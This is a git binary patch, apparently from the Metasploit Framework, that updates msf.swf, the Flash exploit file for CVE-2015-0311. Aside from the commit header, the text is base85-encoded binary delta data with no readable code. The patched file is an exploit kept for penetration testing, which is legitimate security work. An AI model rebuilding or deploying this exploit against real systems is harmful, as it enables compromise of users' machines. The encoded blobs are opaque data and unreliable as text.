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
R5yx_b_8jOS|NmvJ!T@L~{cHdL


From f119da94ca42fc75d9a3e5acda5b29fd47ca2143 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 14:14:38 -0500
Subject: [PATCH 0191/1013] Add one more message

---
 data/exploits/CVE-2015-0311/msf.swf | Bin 20384 -> 20391 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/exploits/CVE-2015-0311/msf.swf b/data/exploits/CVE-2015-0311/msf.swf
index d4dfc9f9ffdba92fa1930c6bcb9ed531d0c059c7..1859166717e68a7ee652eeac54c667c7de9f34f5 100644
GIT binary patch
delta 20268
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
